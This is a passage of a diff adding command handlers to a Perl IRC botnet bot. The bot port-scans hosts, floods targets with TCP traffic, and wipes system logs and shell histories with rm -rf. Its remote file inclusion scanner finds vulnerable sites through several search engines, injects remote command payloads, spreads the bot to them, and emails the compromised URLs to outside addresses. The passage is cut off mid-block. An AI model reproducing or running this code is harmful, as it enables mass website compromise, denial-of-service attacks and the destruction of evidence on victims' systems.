+	sendraw($IRC_cur_socket, "PRIVMSG $printl :9,14*************************");
+}
+
+
+######################
+#   End of  Help     #
+######################
+
+######################
+#     Commands       #
+######################
+
+
+if ($funcarg =~ /^milw0rm/) {
+	my @ltt=();
+	my @bug=();
+	my $x;
+	my $page="";
+	my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
+	print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+	my @r = <$socke>;
+	$page="@r";
+	close($socke);
+	while ($page =~  m/<title>(.*)</g){
+	$x = $1;
+	if ($x =~ /\&lt\;/) {
+	$x =~ s/\&lt\;/</g;
+	}
+	if ($x !~ /milw0rm/) {
+	push (@bug,$x);
+	}}
+	while ($page =~  m/<link.*expl.*([0-9]...)</g) {
+	if ($1 !~ m/milw0rm.com|exploits|en/){
+	push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
+	}}
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[7Milw0rm12]15  Latest exploits :");
+	foreach $x (0..(@ltt - 1)) {
+	sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[7Milw0rm12]9  $bug[$x] - 8$ltt[$x]");
+	sleep 1;
+}}
+
+######################
+#      Portscan      #
+######################
+
+if ($funcarg =~ /^portscan (.*)/) {
+  my $hostip="$1";
+  my
+  @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
+  my (@aberta, %porta_banner);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Portscan12]12 Scanning for open ports on  4".$1." 12 started .");
+  foreach my $porta (@portas)  {
+    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
+    'tcp', Timeout => 4);
+    if ($scansock) {
+      push (@aberta, $porta);
+      $scansock->close;
+    }
+  }
+  
+  if (@aberta) {
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Portscan12]12 Open ports founded: @aberta");
+    } else {
+    sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@Portscan12]12 No open ports foundend.");
+  }
+}
+
+######################
+#  End of  Portscan  # 
+######################
+
+######################
+#        Nmap        #
+######################
+   if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
+         my $hostip="$1";
+         my $portstart = "$2";
+         my $portend = "$3";
+         my (@abertas, %porta_banner); 
+       sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[7Nmap12] 9: $1 12.:15Ports12:. 9 $2-$3");
+       foreach my $porta ($portstart..$portend){
+               my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); 
+    if ($scansock) {
+                 push (@abertas, $porta);
+                 $scansock->close;
+                 if ($xstats){
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[7Nmap12] 15Founded 9 $porta"."/Open"); 
+                 }
+               }
+             }
+             if (@abertas) {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[7Nmap12] 15Complete");
+             } else {
+        sendraw($IRC_cur_socket, "PRIVMSG $printl :12,1[7Nmap12] 15No open ports have been founded 13");
+             }
+			 }
+######################
+#    End of Nmap     #  
+######################
+
+######################
+#    Log Cleaner     #
+######################
+if ($funcarg =~ /^logcleaner/) {
+sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@LogCleaner12] This process can be long, just wait"); 
+	system 'rm -rf /var/log/lastlog';
+	system 'rm -rf /var/log/wtmp';
+	system 'rm -rf /etc/wtmp';
+	system 'rm -rf /var/run/utmp';
+	system 'rm -rf /etc/utmp';
+	system 'rm -rf /var/log';
+	system 'rm -rf /var/logs';
+	system 'rm -rf /var/adm';
+	system 'rm -rf /var/apache/log';
+	system 'rm -rf /var/apache/logs';
+	system 'rm -rf /usr/local/apache/log'; 
+	system 'rm -rf /usr/local/apache/logs';
+	system 'rm -rf /root/.bash_history';
+	system 'rm -rf /root/.ksh_history';
+sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@LogCleaner12] All default log and bash_history files erased"); 
+	sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@LogCleaner12] Now Erasing the rest of the machine log files");
+	system 'find / -name *.bash_history -exec rm -rf {} \;';
+	system 'find / -name *.bash_logout -exec rm -rf {} \;';
+	system 'find / -name "log*" -exec rm -rf {} \;';
+	system 'find / -name *.log -exec rm -rf {} \;';
+	sleep 1;
+sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@LogCleaner12] Done! All logs erased"); 
+      }
+######################
+# End of Log Cleaner # 
+######################
+
+######################
+#  Join And Part     #
+######################
+           if ($funcarg =~ /^join (.*)/) {
+              sendraw($IRC_cur_socket, "JOIN ".$1);
+           }
+           if ($funcarg =~ /^part (.*)/) {
+              sendraw($IRC_cur_socket, "PART ".$1);
+           }
+		   
+######################
+#End of Join And Part# 
+######################
+
+######################
+#     TCPFlood       #
+######################
+
+if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@TCP-DDOS12] Attacking 4 ".$1.":".$2." 12for 4 ".$3." 12seconds.");
+  my $itime = time;
+  my ($cur_time);
+  $cur_time = time - $itime;
+  while ($3>$cur_time){
+  $cur_time = time - $itime;
+  &tcpflooder("$1","$2","$3");
+}
+sendraw($IRC_cur_socket,"PRIVMSG $printl :12[4@TCP-DDOS12] Attack done 4 ".$1.":".$2.".");
+}
+######################
+#  End of TCPFlood   #
+######################
+
+######################
+#    EXTREME SCANNER #
+######################
+
+############
+## GOOGLE ##
+############
+if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+### Start Message
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 15RFI Scanner is started for 4$dork");
+### End of Start Message
+# Starting The Search Engine
+	my @google=&googlet($dork);
+#
+push(my @tot, @google);
+#
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 12G4o8o12g9l4e12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for2 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 12G4o8o12g9l4e12 finished for2 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[12G4o8o12g9l4e1212] 2(12SafeMode:3OFF2) 4 $print ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2,1[3OFF2] 4 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+
+}}
+elsif($re =~ /MaXiMiZeR/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[12G4o8o12g9l4e1212] 2(12SafeMode:4ON2) 3 $print ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread2."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+############
+## UOL ##
+############
+if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+
+
+my @uollist=&uol($dork);
+
+push(my @tot, @uollist);
+
+my @puliti=&unici(@tot);
+
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 12UOL12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for2 $dork ");
+
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 12UOL12 finished for2 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[12UOL12] 2(12SafeMode:3OFF2) 4 $print ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2,1[3OFF2] 4 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );;
+
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MaXiMiZeR/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[12UOL12] 2(12SafeMode:4ON2) 3 $print ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread2."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+
+###############
+## AllTheWeb ##
+###############
+if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @alltheweb=&allthewebt($dork);
+	my @allweb=&standard($dork);
+#
+push(my @tot, @alltheweb, @allweb);
+#
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7AllTheWeb12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7AllTheWeb12 finished for2 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7AllTheWeb12] 2(12SafeMode:4OFF2) 3 $print ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MaXiMiZeR/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7AllTheWeb12] 2(12SafeMode:3ON2) 2(12Site:4 $print 2) ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread2."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+
+###############
+## GigaBlast ##
+###############
+if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @gigalist=&gigablast($dork);
+	
+push(my @tot, @gigalist);
+#
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7GigaBlast12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7GigaBlast12 finished for2 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7GigaBlast12] 2(12SafeMode:4OFF2) 3 $print ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MaXiMiZeR/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7GigaBlast12] 2(12SafeMode:3ON2) 2(12Site:4 $print 2) ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: ON\@target.com\n";
+print MAIL "To: superbot.scan\@gmail.com\n";
+print MAIL "Subject: [SafeMode:ON]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread2."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+#########
+## AOL ##
+#########
+if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+#
+	my @aollist=&aol($dork);
+	push(my @tot, @aollist);
+
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7AOL12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7AOL12 finished for2 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7AOL12] 2(12SafeMode:4OFF2) 2(12Site:4 $print 2) ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MaXiMiZeR/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7AOL12] 2(12SafeMode:4ON2) 3 $print ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread2."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+###########
+## Yahoo ##
+###########
+if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @ylist=&yahoo($dork);
+
+push(my @tot, @ylist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 13Y6ahoo4!12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 13Y6ahoo4!12 finished for2 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[13Y6ahoo4!12] 2(12SafeMode:4OFF2) 2(12Site:4 $print 2) ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MaXiMiZeR/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[13Y6ahoo4!12] 2(12SafeMode:3ON2) 2(12Site:4 $print 2) ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread2."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+#########
+## MSN ##
+#########
+if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @mlist=&msn($dork);
+push(my @tot, @mlist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7M4S7N12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 7M4S7N12 finished for2 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7M4S7N12] 2(12SafeMode:4OFF2) 2(12Site:4 $print 2) ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MaXiMiZeR/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[7M4S7N12] 2(12SafeMode:3ON2) 2(12Site:4 $print 2) ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread2."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+#########
+## ASK ##
+#########
+if ($funcarg =~ /^rfi\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @asklist=&ask($dork);
+push(my @tot, @asklist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 14A4S14K12 Total:4 ".scalar(@tot)." 12Cleaned:4 ".scalar(@puliti)." 12for 2 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){ 
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :3[7S3]8uper3[7BOT3] 14A4S14K12 finished for2 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /MaXiMiZeR/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[14A4S14K12] 2(12SafeMode:4OFF2) 2(12Site:4 $print 2) ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[3OFF2] 4 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+elsif($re =~ /MaXiMiZeR/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :12[14A4S14K12] 2(12SafeMode:3ON2) 2(12Site:4 $print 2) ");
+  sendraw($IRC_cur_socket, "PRIVMSG Real-MaXiMiZeR :2[4ON2] 3 $print ");
+
+open ( MAIL, "| /usr/lib/sendmail -t" );
+print MAIL "From: OFF\@target.com\n";
+print MAIL "To: shefutz2007\@yahoo.com\n";
+print MAIL "Subject: [SafeMode:OFF]\n\n";
+print MAIL " $print \n";
+print MAIL "\n.\n";
+close ( MAIL );
+
